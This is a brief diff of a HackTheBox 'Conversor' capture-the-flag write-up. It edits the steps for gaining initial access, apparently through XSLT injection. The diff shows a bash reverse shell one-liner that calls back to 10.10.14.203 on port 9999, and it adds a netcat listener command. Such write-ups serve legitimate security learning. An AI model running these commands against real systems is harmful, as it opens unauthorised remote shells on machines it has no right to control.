Ouss6116/HackTheBox-Writeup/Conversor/HTB-Conversor-Writeup.md

 bash -c 'bash -i >& /dev/tcp/10.10.14.203/9999 0>&1'
 ```

-and last thing, nc listener.
+and last thing, nc listener `nc -nlvp 9999`.

-and by that we get our initial access, as you can see
+and by that we get our initial access, as you can see:

 ![Icon](Images/xsltrevshell.png)